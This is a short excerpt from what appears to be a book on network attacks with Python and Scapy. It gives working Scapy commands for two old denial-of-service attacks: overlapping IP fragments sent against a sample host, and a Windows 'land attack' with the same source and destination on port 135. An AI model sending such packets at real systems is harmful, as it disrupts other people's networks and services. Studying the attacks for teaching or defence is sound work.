April 2017
Intermediate to advanced
350 pages
8h 35m
English
Another DoS from back in the day, using fragment offset to sabotage the victim connection/network communication:
>>> send(IP(dst=192.168.0.6, id=42, flags="MF")/UDP()/("X"*10))
>>> send(IP(dst=192.168.0.6, id=42, frag=48)/("X"*116))
>>> send(IP(dst=192.168.0.6, id=42, flags="MF")/UDP()/("X"*224))
Land attack (only Microsoft Windows):
>>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
Read now
Unlock full access